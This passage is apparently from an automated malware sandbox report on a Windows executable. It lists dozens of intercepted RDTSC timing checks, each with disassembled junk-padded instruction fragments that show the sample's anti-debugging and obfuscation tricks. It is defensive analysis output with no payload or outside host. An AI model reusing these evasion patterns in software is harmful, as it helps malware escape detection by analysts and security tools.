              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523031C second address: 5230398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5AF4D0D7D3h 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 mov dh, ah 0x00000013 popad 0x00000014 mov eax, dword ptr [75C74538h] 0x00000019 jmp 00007F5AF4D0D7D3h 0x0000001e xor dword ptr [ebp-08h], eax 0x00000021 jmp 00007F5AF4D0D7D6h 0x00000026 xor eax, ebp 0x00000028 jmp 00007F5AF4D0D7D1h 0x0000002d nop 0x0000002e jmp 00007F5AF4D0D7CEh 0x00000033 push eax 0x00000034 pushad 0x00000035 mov dh, 69h 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230398 second address: 52303A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52303A5 second address: 52303BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52303BC second address: 52303C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52303C2 second address: 5230424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F5AF4D0D7D7h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 jmp 00007F5AF4D0D7D6h 0x0000001b mov dword ptr [ebp-18h], esp 0x0000001e jmp 00007F5AF4D0D7D0h 0x00000023 mov eax, dword ptr fs:[00000018h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 47EDB8F0h 0x00000031 push ebx 0x00000032 pop esi 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230424 second address: 5230439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006761h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230439 second address: 52304CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov di, 307Ch 0x00000014 pushfd 0x00000015 jmp 00007F5AF4D0D7D5h 0x0000001a and ax, 67D6h 0x0000001f jmp 00007F5AF4D0D7D1h 0x00000024 popfd 0x00000025 popad 0x00000026 mov esi, 0A01C747h 0x0000002b popad 0x0000002c test ecx, ecx 0x0000002e jmp 00007F5AF4D0D7CAh 0x00000033 jns 00007F5AF4D0D7F9h 0x00000039 jmp 00007F5AF4D0D7D0h 0x0000003e add eax, ecx 0x00000040 pushad 0x00000041 mov ebx, ecx 0x00000043 pushfd 0x00000044 jmp 00007F5AF4D0D7CAh 0x00000049 or eax, 08A03058h 0x0000004f jmp 00007F5AF4D0D7CBh 0x00000054 popfd 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+08h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52304CF second address: 52304D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52304D3 second address: 52304D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220010 second address: 5220016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220016 second address: 522001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522001C second address: 5220020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220020 second address: 522004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5AF4D0D7D4h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5AF4D0D7CEh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522004E second address: 52200D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5AF5006761h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F5AF5006761h 0x0000000f adc cl, FFFFFF86h 0x00000012 jmp 00007F5AF5006761h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov eax, 6C7D46D3h 0x00000022 pushfd 0x00000023 jmp 00007F5AF5006768h 0x00000028 adc ah, 00000058h 0x0000002b jmp 00007F5AF500675Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F5AF5006765h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52200D6 second address: 5220154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5AF4D0D7D7h 0x00000009 and eax, 3F90127Eh 0x0000000f jmp 00007F5AF4D0D7D9h 0x00000014 popfd 0x00000015 mov ch, 8Ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d jmp 00007F5AF4D0D7D3h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F5AF4D0D7D6h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5AF4D0D7CEh 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220154 second address: 522018B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5AF5006766h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ecx, 138C77B9h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop edx 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52201C8 second address: 52201CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52201CE second address: 52201D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52201D2 second address: 52201F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5AF4D0D7CAh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52201F3 second address: 5220205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220205 second address: 5220209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220209 second address: 522024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 pushfd 0x00000014 jmp 00007F5AF5006765h 0x00000019 xor si, E906h 0x0000001e jmp 00007F5AF5006761h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522024A second address: 52202D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007F5AF4D0D7CEh 0x0000000f test al, al 0x00000011 jmp 00007F5AF4D0D7D0h 0x00000016 je 00007F5AF4D0D9B3h 0x0000001c pushad 0x0000001d mov al, E2h 0x0000001f call 00007F5AF4D0D7D3h 0x00000024 call 00007F5AF4D0D7D8h 0x00000029 pop ecx 0x0000002a pop edi 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f jmp 00007F5AF4D0D7CEh 0x00000034 mov dword ptr [ebp-14h], edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52202D1 second address: 52202D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52202D5 second address: 52202DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52202DB second address: 52202E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52202E1 second address: 52202E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52202FA second address: 5220315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006767h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220315 second address: 522033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F5AF4D0D7D7h 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522033C second address: 5220342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220342 second address: 5220346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220346 second address: 522034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220381 second address: 5220385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220385 second address: 5220389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220389 second address: 522038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522038F second address: 5220395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220395 second address: 52203C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F5B6570B8A1h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop ecx 0x00000016 movsx edx, cx 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52203C0 second address: 522047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5AF5006761h 0x00000009 xor ah, 00000076h 0x0000000c jmp 00007F5AF5006761h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 js 00007F5AF50067D6h 0x0000001b pushad 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007F5AF500675Fh 0x00000023 add ax, 42AEh 0x00000028 jmp 00007F5AF5006769h 0x0000002d popfd 0x0000002e pop eax 0x0000002f pushfd 0x00000030 jmp 00007F5AF5006761h 0x00000035 jmp 00007F5AF500675Bh 0x0000003a popfd 0x0000003b popad 0x0000003c cmp dword ptr [ebp-14h], edi 0x0000003f jmp 00007F5AF5006766h 0x00000044 jne 00007F5B65A04794h 0x0000004a jmp 00007F5AF5006760h 0x0000004f mov ebx, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522047C second address: 5220480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220480 second address: 5220484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220484 second address: 522048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522048A second address: 5220499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220499 second address: 52204A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52205C2 second address: 52205D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52205D1 second address: 5220624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5AF4D0D7CFh 0x00000009 add si, 53DEh 0x0000000e jmp 00007F5AF4D0D7D9h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AF4D0D7D6h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220624 second address: 5220636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521084B second address: 521086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov bh, 2Bh 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5AF4D0D7D6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521086C second address: 52108A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5AF5006766h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ah, D8h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52108A1 second address: 52108C6 instructions: 0x00000000 rdtsc 0x00000002 mov al, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007F5AF4D0D7CAh 0x00000011 mov dword ptr [ebp-04h], 55534552h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, ebx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220AE2 second address: 5220B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F5AF500675Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220B10 second address: 5220B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220B18 second address: 5220B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5AF500675Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007F5AF500675Eh 0x00000019 call 00007F5AF5006762h 0x0000001e pushfd 0x0000001f jmp 00007F5AF5006762h 0x00000024 and ah, FFFFFF98h 0x00000027 jmp 00007F5AF500675Bh 0x0000002c popfd 0x0000002d pop esi 0x0000002e popad 0x0000002f cmp dword ptr [75C7459Ch], 05h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F5AF5006762h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220B94 second address: 5220B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220B9A second address: 5220B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220B9E second address: 5220BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220C71 second address: 5220C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 8Ch 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop eax 0x00000013 jmp 00007F5AF500675Dh 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5220C92 second address: 5220CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230921 second address: 5230925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230925 second address: 5230940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230940 second address: 52309B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5AF5006761h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F5AF5006763h 0x00000019 xor esi, 0715FDBEh 0x0000001f jmp 00007F5AF5006769h 0x00000024 popfd 0x00000025 jmp 00007F5AF5006760h 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52309B8 second address: 52309CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7CEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52309CA second address: 5230A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d push ebx 0x0000000e mov ecx, 65565CFBh 0x00000013 pop ecx 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F5AF500675Ch 0x0000001b mov dword ptr [esp], esi 0x0000001e jmp 00007F5AF5006760h 0x00000023 mov esi, dword ptr [ebp+0Ch] 0x00000026 pushad 0x00000027 mov ebx, ecx 0x00000029 pushfd 0x0000002a jmp 00007F5AF500675Ah 0x0000002f or esi, 59FF62A8h 0x00000035 jmp 00007F5AF500675Bh 0x0000003a popfd 0x0000003b popad 0x0000003c test esi, esi 0x0000003e jmp 00007F5AF5006766h 0x00000043 je 00007F5B659E40D2h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov si, dx 0x0000004f popad 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230A48 second address: 5230AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5AF4D0D7CBh 0x00000009 xor eax, 16AFB54Eh 0x0000000f jmp 00007F5AF4D0D7D9h 0x00000014 popfd 0x00000015 mov cx, 4557h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c cmp dword ptr [75C7459Ch], 05h 0x00000023 jmp 00007F5AF4D0D7CAh 0x00000028 je 00007F5B657031CEh 0x0000002e pushad 0x0000002f mov si, 6B9Dh 0x00000033 mov bx, si 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 mov edi, eax 0x0000003b call 00007F5AF4D0D7CEh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230AB2 second address: 5230AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov bx, ax 0x0000000b pushfd 0x0000000c jmp 00007F5AF5006768h 0x00000011 sbb ax, FE88h 0x00000016 jmp 00007F5AF500675Bh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230AEF second address: 5230B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230B0A second address: 5230B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230B10 second address: 5230B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230B42 second address: 5230B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230B48 second address: 5230B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F5AF4D0D7D7h 0x00000014 add al, FFFFFFEEh 0x00000017 jmp 00007F5AF4D0D7D9h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CE041 second address: 66CE045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CE045 second address: 66CE04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C06E9 second address: 66C06FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C06FE second address: 66C0702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD05C second address: 66CD060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD060 second address: 66CD069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD35F second address: 66CD369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5AF5006756h 0x0000000a rdtsc
